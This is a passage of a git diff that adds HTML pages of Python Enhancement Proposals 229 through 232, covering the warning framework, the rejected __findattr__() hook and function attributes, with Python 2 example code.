  • Adds setup.py to the top directory of the source tree. setup.py +is the largest piece of the puzzle, though not the most +complicated. setup.py contains a subclass of the BuildExt +class, and extends it with a detect_modules() method that does +the work of figuring out when modules can be compiled, and adding +them to the ‘exts’ list.
  • +
+
+
+

Unresolved Issues

+

Do we need to make it possible to disable the 3 hard-wired modules +without manually hacking the Makefiles? [Answer: No.]

+

The Distutils always compile modules as shared libraries. How do +we support compiling them statically into the resulting Python +binary?

+

[Answer: building a Python binary with the Distutils should be +feasible, though no one has implemented it yet. This should be +done someday, but isn’t a pressing priority as messing around with +the top-level Makefile.pre.in is good enough.]

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0229.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0230/index.html b/pep-0230/index.html new file mode 100644 index 00000000000..1f3a2d6929f --- /dev/null +++ b/pep-0230/index.html @@ -0,0 +1,454 @@ + + + + + + + + PEP 230 – Warning Framework | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 230 – Warning Framework

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Nov-2000
+
Python-Version:
+
2.1
+
Post-History:
+
05-Nov-2000
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a C and Python level API, as well as command +line flags, to issue warning messages and control what happens to +them. This is mostly based on GvR’s proposal posted to python-dev +on 05-Nov-2000, with some ideas (such as using classes to +categorize warnings) merged in from Paul Prescod’s +counter-proposal posted on the same date. Also, an attempt to +implement the proposal caused several small tweaks.

+
+
+

Motivation

+

With Python 3000 looming, it is necessary to start issuing +warnings about the use of obsolete or deprecated features, in +addition to errors. There are also lots of other reasons to be +able to issue warnings, both from C and from Python code, both at +compile time and at run time.

+

Warnings aren’t fatal, and thus it’s possible that a program +triggers the same warning many times during a single execution. +It would be annoying if a program emitted an endless stream of +identical warnings. Therefore, a mechanism is needed that +suppresses multiple identical warnings.

+

It is also desirable to have user control over which warnings are +printed. While in general it is useful to see all warnings all +the time, there may be times where it is impractical to fix the +code right away in a production program. In this case, there +should be a way to suppress warnings.

+

It is also useful to be able to suppress specific warnings during +program development, e.g. when a warning is generated by a piece +of 3rd party code that cannot be fixed right away, or when there +is no way to fix the code (possibly a warning message is generated +for a perfectly fine piece of code). It would be unwise to offer +to suppress all warnings in such cases: the developer would miss +warnings about the rest of the code.

+

On the other hand, there are also situations conceivable where +some or all warnings are better treated as errors. For example, +it may be a local coding standard that a particular deprecated +feature should not be used. In order to enforce this, it is +useful to be able to turn the warning about this particular +feature into an error, raising an exception (without necessarily +turning all warnings into errors).

+

Therefore, I propose to introduce a flexible “warning filter” +which can filter out warnings or change them into exceptions, +based on:

+
    +
  • Where in the code they are generated (per package, module, or +function)
  • +
  • The warning category (warning categories are discussed below)
  • +
  • A specific warning message
  • +
+

The warning filter must be controllable both from the command line +and from Python code.

+
+
+

APIs For Issuing Warnings

+
    +
  • To issue a warning from Python:
    import warnings
    +warnings.warn(message[, category[, stacklevel]])
    +
    +
    +

    The category argument, if given, must be a warning category +class (see below); it defaults to warnings.UserWarning. This +may raise an exception if the particular warning issued is +changed into an error by the warnings filter. The stacklevel +can be used by wrapper functions written in Python, like this:

    +
    def deprecation(message):
    +    warn(message, DeprecationWarning, level=2)
    +
    +
    +

    This makes the warning refer to the deprecation()’s caller, +rather than to the source of deprecation() itself (since the +latter would defeat the purpose of the warning message).

    +
  • +
  • To issue a warning from C:
    int PyErr_Warn(PyObject *category, char *message);
    +
    +
    +

    Return 0 normally, 1 if an exception is raised (either because +the warning was transformed into an exception, or because of a +malfunction in the implementation, such as running out of +memory). The category argument must be a warning category class +(see below) or NULL, in which case it defaults to +PyExc_RuntimeWarning. When PyErr_Warn() function returns 1, the +caller should do normal exception handling.

    +

    The current C implementation of PyErr_Warn() imports the +warnings module (implemented in Python) and calls its warn() +function. This minimizes the amount of C code that needs to be +added to implement the warning feature.

    +

    [XXX Open Issue: what about issuing warnings during lexing or +parsing, which don’t have the exception machinery available?]

    +
  • +
+
+
+

Warnings Categories

+

There are a number of built-in exceptions that represent warning +categories. This categorization is useful to be able to filter +out groups of warnings. The following warnings category classes +are currently defined:

+
    +
  • Warning – this is the base class of all warning category +classes and it itself a subclass of Exception
  • +
  • UserWarning – the default category for warnings.warn()
  • +
  • DeprecationWarning – base category for warnings about deprecated +features
  • +
  • SyntaxWarning – base category for warnings about dubious +syntactic features
  • +
  • RuntimeWarning – base category for warnings about dubious +runtime features
  • +
+

[XXX: Other warning categories may be proposed during the review +period for this PEP.]

+

These standard warning categories are available from C as +PyExc_Warning, PyExc_UserWarning, etc. From Python, they are +available in the __builtin__ module, so no import is necessary.

+

User code can define additional warning categories by subclassing +one of the standard warning categories. A warning category must +always be a subclass of the Warning class.

+
+
+

The Warnings Filter

+

The warnings filter control whether warnings are ignored, +displayed, or turned into errors (raising an exception).

+

There are three sides to the warnings filter:

+
    +
  • The data structures used to efficiently determine the +disposition of a particular warnings.warn() or PyErr_Warn() +call.
  • +
  • The API to control the filter from Python source code.
  • +
  • The command line switches to control the filter.
  • +
+

The warnings filter works in several stages. It is optimized for +the (expected to be common) case where the same warning is issued +from the same place in the code over and over.

+

First, the warning filter collects the module and line number +where the warning is issued; this information is readily available +through sys._getframe().

+

Conceptually, the warnings filter maintains an ordered list of +filter specifications; any specific warning is matched against +each filter specification in the list in turn until a match is +found; the match determines the disposition of the match. Each +entry is a tuple as follows:

+
(category, message, module, lineno, action)
+
+
+
    +
  • category is a class (a subclass of warnings.Warning) of which +the warning category must be a subclass in order to match
  • +
  • message is a compiled regular expression that the warning +message must match (the match is case-insensitive)
  • +
  • module is a compiled regular expression that the module name +must match
  • +
  • lineno is an integer that the line number where the warning +occurred must match, or 0 to match all line numbers
  • +
  • action is one of the following strings:
      +
    • “error” – turn matching warnings into exceptions
    • +
    • “ignore” – never print matching warnings
    • +
    • “always” – always print matching warnings
    • +
    • “default” – print the first occurrence of matching warnings +for each location where the warning is issued
    • +
    • “module” – print the first occurrence of matching warnings +for each module where the warning is issued
    • +
    • “once” – print only the first occurrence of matching +warnings
    • +
    +
  • +
+

Since the Warning class is derived from the built-in Exception +class, to turn a warning into an error we simply raise +category(message).

+
+
+

Warnings Output And Formatting Hooks

+

When the warnings filter decides to issue a warning (but not when +it decides to raise an exception), it passes the information about +the function warnings.showwarning(message, category, filename, lineno). +The default implementation of this function writes the warning text +to sys.stderr, and shows the source line of the filename. It has +an optional 5th argument which can be used to specify a different +file than sys.stderr.

+

The formatting of warnings is done by a separate function, +warnings.formatwarning(message, category, filename, lineno). This +returns a string (that may contain newlines and ends in a newline) +that can be printed to get the identical effect of the +showwarning() function.

+
+
+

API For Manipulating Warning Filters

+
warnings.filterwarnings(message, category, module, lineno, action)
+
+
+

This checks the types of the arguments, compiles the message and +module regular expressions, and inserts them as a tuple in front +of the warnings filter.

+
warnings.resetwarnings()
+
+
+

Reset the warnings filter to empty.

+
+
+

Command Line Syntax

+

There should be command line options to specify the most common +filtering actions, which I expect to include at least:

+
    +
  • suppress all warnings
  • +
  • suppress a particular warning message everywhere
  • +
  • suppress all warnings in a particular module
  • +
  • turn all warnings into exceptions
  • +
+

I propose the following command line option syntax:

+
-Waction[:message[:category[:module[:lineno]]]]
+
+
+

Where:

+
    +
  • ‘action’ is an abbreviation of one of the allowed actions +(“error”, “default”, “ignore”, “always”, “once”, or “module”)
  • +
  • ‘message’ is a message string; matches warnings whose message +text is an initial substring of ‘message’ (matching is +case-insensitive)
  • +
  • ‘category’ is an abbreviation of a standard warning category +class name or a fully-qualified name for a user-defined +warning category class of the form [package.]module.classname
  • +
  • ‘module’ is a module name (possibly package.module)
  • +
  • ‘lineno’ is an integral line number
  • +
+

All parts except ‘action’ may be omitted, where an empty value +after stripping whitespace is the same as an omitted value.

+

The C code that parses the Python command line saves the body of +all -W options in a list of strings, which is made available to +the warnings module as sys.warnoptions. The warnings module +parses these when it is first imported. Errors detected during +the parsing of sys.warnoptions are not fatal; a message is written +to sys.stderr and processing continues with the option.

+

Examples:

+
+
-Werror
Turn all warnings into errors
+
-Wall
Show all warnings
+
-Wignore
Ignore all warnings
+
-Wi:hello
Ignore warnings whose message text starts with “hello”
+
-We::Deprecation
Turn deprecation warnings into errors
+
-Wi:::spam:10
Ignore all warnings on line 10 of module spam
+
-Wi:::spam -Wd:::spam:10
Ignore all warnings in module spam except on line 10
+
-We::Deprecation -Wd::Deprecation:spam
Turn deprecation warnings into errors except in module spam
+
+
+
+

Open Issues

+

Some open issues off the top of my head:

+
    +
  • What about issuing warnings during lexing or parsing, which +don’t have the exception machinery available?
  • +
  • The proposed command line syntax is a bit ugly (although the +simple cases aren’t so bad: -Werror, -Wignore, etc.). Anybody +got a better idea?
  • +
  • I’m a bit worried that the filter specifications are too +complex. Perhaps filtering only on category and module (not on +message text and line number) would be enough?
  • +
  • There’s a bit of confusion between module names and file names. +The reporting uses file names, but the filter specification uses +module names. Maybe it should allow filenames as well?
  • +
  • I’m not at all convinced that packages are handled right.
  • +
  • Do we need more standard warning categories? Fewer?
  • +
  • In order to minimize the start-up overhead, the warnings module +is imported by the first call to PyErr_Warn(). It does the +command line parsing for -W options upon import. Therefore, it +is possible that warning-free programs will not complain about +invalid -W options.
  • +
+
+
+

Rejected Concerns

+

Paul Prescod, Barry Warsaw and Fred Drake have brought up several +additional concerns that I feel aren’t critical. I address them +here (the concerns are paraphrased, not exactly their words):

+
    +
  • Paul: warn() should be a built-in or a statement to make it easily +available.

    Response: “from warnings import warn” is easy enough.

    +
  • +
  • Paul: What if I have a speed-critical module that triggers +warnings in an inner loop. It should be possible to disable the +overhead for detecting the warning (not just suppress the +warning).

    Response: rewrite the inner loop to avoid triggering the +warning.

    +
  • +
  • Paul: What if I want to see the full context of a warning?

    Response: use -Werror to turn it into an exception.

    +
  • +
  • Paul: I prefer “:*:*:” to “:::” for leaving parts of the warning +spec out.

    Response: I don’t.

    +
  • +
  • Barry: It would be nice if lineno can be a range specification.

    Response: Too much complexity already.

    +
  • +
  • Barry: I’d like to add my own warning action. Maybe if ‘action’ +could be a callable as well as a string. Then in my IDE, I +could set that to “mygui.popupWarningsDialog”.

    Response: For that purpose you would override +warnings.showwarning().

    +
  • +
  • Fred: why do the Warning category classes have to be in +__builtin__?

    Response: that’s the simplest implementation, given that the +warning categories must be available in C before the first +PyErr_Warn() call, which imports the warnings module. I see no +problem with making them available as built-ins.

    +
  • +
+
+
+

Implementation

+

Here’s a prototype implementation: +http://sourceforge.net/patch/?func=detailpatch&patch_id=102715&group_id=5470

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0230.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0231/index.html b/pep-0231/index.html new file mode 100644 index 00000000000..165b9ecfdaa --- /dev/null +++ b/pep-0231/index.html @@ -0,0 +1,752 @@ + + + + + + + + PEP 231 – __findattr__() | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 231 – __findattr__()

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
30-Nov-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP describes an extension to instance attribute lookup and +modification machinery, which allows pure-Python implementations +of many interesting programming models. This PEP tracks the +status and ownership of this feature. It contains a description +of the feature and outlines changes necessary to support the +feature. This PEP summarizes discussions held in mailing list +forums, and provides URLs for further information, where +appropriate. The CVS revision history of this file contains the +definitive historical record.

+
+
+

Background

+

The semantics for Python instances allow the programmer to +customize some aspects of attribute lookup and attribute +modification, through the special methods __getattr__() and +__setattr__() [1].

+

However, because of certain restrictions imposed by these methods, +there are useful programming techniques that can not be written in +Python alone, e.g. strict Java Bean-like [2] interfaces and Zope +style acquisitions [3]. In the latter case, Zope solves this by +including a C extension called ExtensionClass [5] which modifies +the standard class semantics, and uses a metaclass hook in +Python’s class model called alternatively the “Don Beaudry Hook” +or “Don Beaudry Hack” [6].

+

While Zope’s approach works, it has several disadvantages. First, +it requires a C extension. Second it employs a very arcane, but +truck-sized loophole in the Python machinery. Third, it can be +difficult for other programmers to use and understand (the +metaclass has well-known brain exploding properties). And fourth, +because ExtensionClass instances aren’t “real” Python instances, +some aspects of the Python runtime system don’t work with +ExtensionClass instances.

+

Proposals for fixing this problem have often been lumped under the +rubric of fixing the “class/type dichotomy”; that is, eliminating +the difference between built-in types and classes [7]. While a +laudable goal itself, repairing this rift is not necessary in +order to achieve the types of programming constructs described +above. This proposal provides an 80% solution with a minimum of +modification to Python’s class and instance objects. It does +nothing to address the type/class dichotomy.

+
+
+

Proposal

+

This proposal adds a new special method called __findattr__() with +the following semantics:

+
    +
  • If defined in a class, it will be called on all instance +attribute resolutions instead of __getattr__() and +__setattr__().
  • +
  • __findattr__() is never called recursively. That is, when a +specific instance’s __findattr__() is on the call stack, further +attribute accesses for that instance will use the standard +__getattr__() and __setattr__() methods.
  • +
  • __findattr__() is called for both attribute access (‘getting’) +and attribute modification (‘setting’). It is not called for +attribute deletion.
  • +
  • When called for getting, it is passed a single argument (not +counting ‘self’): the name of the attribute being accessed.
  • +
  • When called for setting, it is called with third argument, which +is the value to set the attribute to.
  • +
  • __findattr__() methods have the same caching semantics as +__getattr__() and __setattr__(); i.e. if they are present in the +class at class definition time, they are used, but if they are +subsequently added to a class later they are not.
  • +
+
+
+

Key Differences with the Existing Protocol

+

__findattr__()’s semantics are different from the existing +protocol in key ways:

+

First, __getattr__() is never called if the attribute is found in +the instance’s __dict__. This is done for efficiency reasons, and +because otherwise, __setattr__() would have no way to get to the +instance’s attributes.

+

Second, __setattr__() cannot use “normal” syntax for setting +instance attributes, e.g. “self.name = foo” because that would +cause recursive calls to __setattr__().

+

__findattr__() is always called regardless of whether the +attribute is in __dict__ or not, and a flag in the instance object +prevents recursive calls to __findattr__(). This gives the class +a chance to perform some action for every attribute access. And +because it is called for both gets and sets, it is easy to write +similar policy for all attribute access. Further, efficiency is +not a problem because it is only paid when the extended mechanism +is used.

+
+ +
+

Examples

+

One programming style that this proposal allows is a Java +Bean-like interface to objects, where unadorned attribute access +and modification is transparently mapped to a functional +interface. E.g.

+
class Bean:
+    def __init__(self, x):
+        self.__myfoo = x
+
+    def __findattr__(self, name, *args):
+        if name.startswith('_'):
+            # Private names
+            if args: setattr(self, name, args[0])
+            else:    return getattr(self, name)
+        else:
+            # Public names
+            if args: name = '_set_' + name
+            else:    name = '_get_' + name
+            return getattr(self, name)(*args)
+
+    def _set_foo(self, x):
+        self.__myfoo = x
+
+    def _get_foo(self):
+        return self.__myfoo
+
+
+b = Bean(3)
+print b.foo
+b.foo = 9
+print b.foo
+
+
+

A second, more elaborate example is the implementation of both +implicit and explicit acquisition in pure Python:

+
import types
+
+class MethodWrapper:
+    def __init__(self, container, method):
+        self.__container = container
+        self.__method = method
+
+    def __call__(self, *args, **kws):
+        return self.__method.im_func(self.__container, *args, **kws)
+
+
+class WrapperImplicit:
+    def __init__(self, contained, container):
+        self.__contained = contained
+        self.__container = container
+
+    def __repr__(self):
+        return '<Wrapper: [%s | %s]>' % (self.__container,
+                                         self.__contained)
+
+    def __findattr__(self, name, *args):
+        # Some things are our own
+        if name.startswith('_WrapperImplicit__'):
+            if args: return setattr(self, name, *args)
+            else:    return getattr(self, name)
+        # setattr stores the name on the contained object directly
+        if args:
+            return setattr(self.__contained, name, args[0])
+        # Other special names
+        if name == 'aq_parent':
+            return self.__container
+        elif name == 'aq_self':
+            return self.__contained
+        elif name == 'aq_base':
+            base = self.__contained
+            try:
+                while 1:
+                    base = base.aq_self
+            except AttributeError:
+                return base
+        # no acquisition for _ names
+        if name.startswith('_'):
+            return getattr(self.__contained, name)
+        # Everything else gets wrapped
+        missing = []
+        which = self.__contained
+        obj = getattr(which, name, missing)
+        if obj is missing:
+            which = self.__container
+            obj = getattr(which, name, missing)
+            if obj is missing:
+                raise AttributeError, name
+        of = getattr(obj, '__of__', missing)
+        if of is not missing:
+            return of(self)
+        elif type(obj) == types.MethodType:
+            return MethodWrapper(self, obj)
+        return obj
+
+
+class WrapperExplicit:
+    def __init__(self, contained, container):
+        self.__contained = contained
+        self.__container = container
+
+    def __repr__(self):
+        return '<Wrapper: [%s | %s]>' % (self.__container,
+                                         self.__contained)
+
+    def __findattr__(self, name, *args):
+        # Some things are our own
+        if name.startswith('_WrapperExplicit__'):
+            if args: return setattr(self, name, *args)
+            else:    return getattr(self, name)
+        # setattr stores the name on the contained object directly
+        if args:
+            return setattr(self.__contained, name, args[0])
+        # Other special names
+        if name == 'aq_parent':
+            return self.__container
+        elif name == 'aq_self':
+            return self.__contained
+        elif name == 'aq_base':
+            base = self.__contained
+            try:
+                while 1:
+                    base = base.aq_self
+            except AttributeError:
+                return base
+        elif name == 'aq_acquire':
+            return self.aq_acquire
+        # explicit acquisition only
+        obj = getattr(self.__contained, name)
+        if type(obj) == types.MethodType:
+            return MethodWrapper(self, obj)
+        return obj
+
+    def aq_acquire(self, name):
+        # Everything else gets wrapped
+        missing = []
+        which = self.__contained
+        obj = getattr(which, name, missing)
+        if obj is missing:
+            which = self.__container
+            obj = getattr(which, name, missing)
+            if obj is missing:
+                raise AttributeError, name
+        of = getattr(obj, '__of__', missing)
+        if of is not missing:
+            return of(self)
+        elif type(obj) == types.MethodType:
+            return MethodWrapper(self, obj)
+        return obj
+
+
+class Implicit:
+    def __of__(self, container):
+        return WrapperImplicit(self, container)
+
+    def __findattr__(self, name, *args):
+        # ignore setattrs
+        if args:
+            return setattr(self, name, args[0])
+        obj = getattr(self, name)
+        missing = []
+        of = getattr(obj, '__of__', missing)
+        if of is not missing:
+            return of(self)
+        return obj
+
+
+class Explicit(Implicit):
+    def __of__(self, container):
+        return WrapperExplicit(self, container)
+
+
+# tests
+class C(Implicit):
+    color = 'red'
+
+class A(Implicit):
+    def report(self):
+        return self.color
+
+# simple implicit acquisition
+c = C()
+a = A()
+c.a = a
+assert c.a.report() == 'red'
+
+d = C()
+d.color = 'green'
+d.a = a
+assert d.a.report() == 'green'
+
+try:
+    a.report()
+except AttributeError:
+    pass
+else:
+    assert 0, 'AttributeError expected'
+
+
+# special names
+assert c.a.aq_parent is c
+assert c.a.aq_self is a
+
+c.a.d = d
+assert c.a.d.aq_base is d
+assert c.a is not a
+
+
+# no acquisition on _ names
+class E(Implicit):
+    _color = 'purple'
+
+class F(Implicit):
+    def report(self):
+        return self._color
+
+e = E()
+f = F()
+e.f = f
+try:
+    e.f.report()
+except AttributeError:
+    pass
+else:
+    assert 0, 'AttributeError expected'
+
+
+# explicit
+class G(Explicit):
+    color = 'pink'
+
+class H(Explicit):
+    def report(self):
+        return self.aq_acquire('color')
+
+    def barf(self):
+        return self.color
+
+g = G()
+h = H()
+g.h = h
+assert g.h.report() == 'pink'
+
+i = G()
+i.color = 'cyan'
+i.h = h
+assert i.h.report() == 'cyan'
+
+try:
+    g.i.barf()
+except AttributeError:
+    pass
+else:
+    assert 0, 'AttributeError expected'
+
+
+

C++-like access control can also be accomplished, although less +cleanly because of the difficulty of figuring out what method is +being called from the runtime call stack:

+
import sys
+import types
+
+PUBLIC = 0
+PROTECTED = 1
+PRIVATE = 2
+
+try:
+    getframe = sys._getframe
+except ImportError:
+    def getframe(n):
+        try: raise Exception
+        except Exception:
+            frame = sys.exc_info()[2].tb_frame
+        while n > 0:
+            frame = frame.f_back
+            if frame is None:
+                raise ValueError, 'call stack is not deep enough'
+        return frame
+
+
+class AccessViolation(Exception):
+    pass
+
+
+class Access:
+    def __findattr__(self, name, *args):
+        methcache = self.__dict__.setdefault('__cache__', {})
+        missing = []
+        obj = getattr(self, name, missing)
+        # if obj is missing we better be doing a setattr for
+        # the first time
+        if obj is not missing and type(obj) == types.MethodType:
+            # Digusting hack because there's no way to
+            # dynamically figure out what the method being
+            # called is from the stack frame.
+            methcache[obj.im_func.func_code] = obj.im_class
+        #
+        # What's the access permissions for this name?
+        access, klass = getattr(self, '__access__', {}).get(
+            name, (PUBLIC, 0))
+        if access is not PUBLIC:
+            # Now try to see which method is calling us
+            frame = getframe(0).f_back
+            if frame is None:
+                raise AccessViolation
+            # Get the class of the method that's accessing
+            # this attribute, by using the code object cache
+            if frame.f_code.co_name == '__init__':
+                # There aren't entries in the cache for ctors,
+                # because the calling mechanism doesn't go
+                # through __findattr__().  Are there other
+                # methods that might have the same behavior?
+                # Since we can't know who's __init__ we're in,
+                # for now we'll assume that only protected and
+                # public attrs can be accessed.
+                if access is PRIVATE:
+                    raise AccessViolation
+            else:
+                methclass = self.__cache__.get(frame.f_code)
+                if not methclass:
+                    raise AccessViolation
+                if access is PRIVATE and methclass is not klass:
+                    raise AccessViolation
+                if access is PROTECTED and not issubclass(methclass,
+                                                          klass):
+                    raise AccessViolation
+        # If we got here, it must be okay to access the attribute
+        if args:
+            return setattr(self, name, *args)
+        return obj
+
+# tests
+class A(Access):
+    def __init__(self, foo=0, name='A'):
+        self._foo = foo
+        # can't set private names in __init__
+        self.__initprivate(name)
+
+    def __initprivate(self, name):
+        self._name = name
+
+    def getfoo(self):
+        return self._foo
+
+    def setfoo(self, newfoo):
+        self._foo = newfoo
+
+    def getname(self):
+        return self._name
+
+A.__access__ = {'_foo'      : (PROTECTED, A),
+                '_name'     : (PRIVATE, A),
+                '__dict__'  : (PRIVATE, A),
+                '__access__': (PRIVATE, A),
+                }
+
+class B(A):
+    def setfoo(self, newfoo):
+        self._foo = newfoo + 3
+
+    def setname(self, name):
+        self._name = name
+
+b = B(1)
+b.getfoo()
+
+a = A(1)
+assert a.getfoo() == 1
+a.setfoo(2)
+assert a.getfoo() == 2
+
+try:
+    a._foo
+except AccessViolation:
+    pass
+else:
+    assert 0, 'AccessViolation expected'
+
+try:
+    a._foo = 3
+except AccessViolation:
+    pass
+else:
+    assert 0, 'AccessViolation expected'
+
+try:
+    a.__dict__['_foo']
+except AccessViolation:
+    pass
+else:
+    assert 0, 'AccessViolation expected'
+
+
+b = B()
+assert b.getfoo() == 0
+b.setfoo(2)
+assert b.getfoo() == 5
+try:
+    b.setname('B')
+except AccessViolation:
+    pass
+else:
+    assert 0, 'AccessViolation expected'
+
+assert b.getname() == 'A'
+
+
+

Here’s an implementation of the attribute hook described in PEP +213 (except that hooking on attribute deletion isn’t supported by +the current reference implementation).

+
class Pep213:
+    def __findattr__(self, name, *args):
+        hookname = '__attr_%s__' % name
+        if args:
+            op = 'set'
+        else:
+            op = 'get'
+        # XXX: op = 'del' currently not supported
+        missing = []
+        meth = getattr(self, hookname, missing)
+        if meth is missing:
+            if op == 'set':
+                return setattr(self, name, *args)
+            else:
+                return getattr(self, name)
+        else:
+            return meth(op, *args)
+
+
+def computation(i):
+    print 'doing computation:', i
+    return i + 3
+
+
+def rev_computation(i):
+    print 'doing rev_computation:', i
+    return i - 3
+
+
+class X(Pep213):
+    def __init__(self, foo=0):
+        self.__foo = foo
+
+    def __attr_foo__(self, op, val=None):
+        if op == 'get':
+            return computation(self.__foo)
+        elif op == 'set':
+            self.__foo = rev_computation(val)
+        # XXX: 'del' not yet supported
+
+x = X()
+fooval = x.foo
+print fooval
+x.foo = fooval + 5
+print x.foo
+# del x.foo
+
+
+
+
+

Reference Implementation

+

The reference implementation, as a patch to the Python core, can be +found at this URL:

+

http://sourceforge.net/patch/?func=detailpatch&patch_id=102613&group_id=5470

+
+
+

References

+ + +
+
+

Rejection

+

There are serious problems with the recursion-protection feature. +As described here it’s not thread-safe, and a thread-safe solution +has other problems. In general, it’s not clear how helpful the +recursion-protection feature is; it makes it hard to write code +that needs to be callable inside __findattr__ as well as outside +it. But without the recursion-protection, it’s hard to implement +__findattr__ at all (since __findattr__ would invoke itself +recursively for every attribute it tries to access). There seems +to be no good solution here.

+

It’s also dubious how useful it is to support __findattr__ both +for getting and for setting attributes – __setattr__ gets called +in all cases already.

+

The examples can all be implemented using __getattr__ if care is +taken not to store instance variables under their own names.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0231.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0232/index.html b/pep-0232/index.html new file mode 100644 index 00000000000..77b80c63b69 --- /dev/null +++ b/pep-0232/index.html @@ -0,0 +1,364 @@ + + + + + + + + PEP 232 – Function Attributes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 232 – Function Attributes

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Dec-2000
+
Python-Version:
+
2.1
+
Post-History:
+
20-Feb-2001
+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP describes an extension to Python, adding attribute +dictionaries to functions and methods. This PEP tracks the status +and ownership of this feature. It contains a description of the +feature and outlines changes necessary to support the feature. +This PEP summarizes discussions held in mailing list forums, and +provides URLs for further information, where appropriate. The CVS +revision history of this file contains the definitive historical +record.

+
+
+

Background

+

Functions already have a number of attributes, some of which are +writable, e.g. func_doc, a.k.a. func.__doc__. func_doc +has the interesting property that there is special syntax in +function (and method) definitions for implicitly setting the +attribute. This convenience has been exploited over and over again, +overloading docstrings with additional semantics.

+

For example, John Aycock has written a system where docstrings are +used to define parsing rules. [1] Zope’s ZPublisher ORB [2] uses +docstrings to signal publishable methods, i.e. methods that can +be called through the web.

+

The problem with this approach is that the overloaded semantics +may conflict with each other. For example, if we wanted to add a +doctest unit test to a Zope method that should not be publishable +through the web.

+
+
+

Proposal

+

This proposal adds a new dictionary to function objects, called +func_dict (a.k.a. __dict__). This dictionary can be set +and get using ordinary attribute set and get syntax.

+

Methods also gain getter syntax, and they currently access the +attribute through the dictionary of the underlying function +object. It is not possible to set attributes on bound or unbound +methods, except by doing so explicitly on the underlying function +object. See the Future Directions discussion below for +approaches in subsequent versions of Python.

+

A function object’s __dict__ can also be set, but only to a +dictionary object. Deleting a function’s __dict__, or setting +it to anything other than a concrete dictionary object results in a +TypeError. If no function attributes have ever been set, the +function’s __dict__ will be empty.

+
+
+

Examples

+

Here are some examples of what you can do with this feature.

+
def a():
+    pass
+
+a.publish = 1
+a.unittest = '''...'''
+
+if a.publish:
+    print a()
+
+if hasattr(a, 'unittest'):
+    testframework.execute(a.unittest)
+
+class C:
+    def a(self):
+        'just a docstring'
+        a.publish = 1
+
+c = C()
+if c.a.publish:
+    publish(c.a())
+
+
+
+

Other Uses

+

Paul Prescod enumerated a bunch of other uses on the python-dev thread.

+
+
+
+

Future Directions

+

Here are a number of future directions to consider. Any adoption +of these ideas would require a new PEP, which referenced this one, +and would have to be targeted at a Python version subsequent to +the 2.1 release.

+
    +
  • A previous version of this PEP allowed for both setter and +getter of attributes on unbound methods, and only getter on +bound methods. A number of problems were discovered with this +policy.

    Because method attributes were stored in the underlying +function, this caused several potentially surprising results:

    +
    class C:
    +    def a(self): pass
    +
    +c1 = C()
    +c2 = C()
    +c1.a.publish = 1
    +# c2.a.publish would now be == 1 also!
    +
    +
    +

    Because a change to a bound c1 also caused a change to +a bound to c2, setting of attributes on bound methods +was disallowed. However, even allowing setting of attributes on +unbound methods has its ambiguities:

    +
    class D(C): pass
    +class E(C): pass
    +
    +D.a.publish = 1
    +# E.a.publish would now be == 1 also!
    +
    +
    +

    For this reason, the current PEP disallows setting attributes on +either bound or unbound methods, but does allow for getting +attributes on either – both return the attribute value on the +underlying function object.

    +

    A future PEP might propose to implement setting (bound or +unbound) method attributes by setting attributes on the instance +or class, using special naming conventions. I.e.:

    +
    class C:
    +    def a(self): pass
    +
    +C.a.publish = 1
    +C.__a_publish__ == 1 # true
    +
    +c = C()
    +c.a.publish = 2
    +c.__a_publish__ == 2 # true
    +
    +d = C()
    +d.__a_publish__ == 1 # true
    +
    +
    +

    Here, a lookup on the instance would look to the instance’s +dictionary first, followed by a lookup on the class’s +dictionary, and finally a lookup on the function object’s +dictionary.

    +
  • +
  • Currently, Python supports function attributes only on Python +functions (i.e. those that are written in Python, not those that +are built-in). Should it be worthwhile, a separate patch can be +crafted that will add function attributes to built-ins.
  • +
  • __doc__ is the only function attribute that currently has +syntactic support for conveniently setting. It may be +worthwhile to eventually enhance the language for supporting +easy function attribute setting. Here are some syntaxes +suggested by PEP reviewers: [3]
    def a {
    +    'publish' : 1,
    +    'unittest': '''...''',
    +    }
    +    (args):
    +    # ...
    +
    +def a(args):
    +    """The usual docstring."""
    +    {'publish' : 1,
    +     'unittest': '''...''',
    +     # etc.
    +     }
    +
    +def a(args) having (publish = 1):
    +    # see reference [3]
    +    pass
    +
    +
    +

    The BDFL is currently against any such special syntactic support +for setting arbitrary function attributes. Any syntax proposals +would have to be outlined in new PEPs.

    +
  • +
+
+
+

Dissenting Opinion

+

When this was discussed on the python-dev mailing list in April +2000, a number of dissenting opinions were voiced. For +completeness, the discussion thread starts on python-dev.

+

The dissenting arguments appear to fall under the following +categories:

+
    +
  • no clear purpose (what does it buy you?)
  • +
  • other ways to do it (e.g. mappings as class attributes)
  • +
  • useless until syntactic support is included
  • +
+

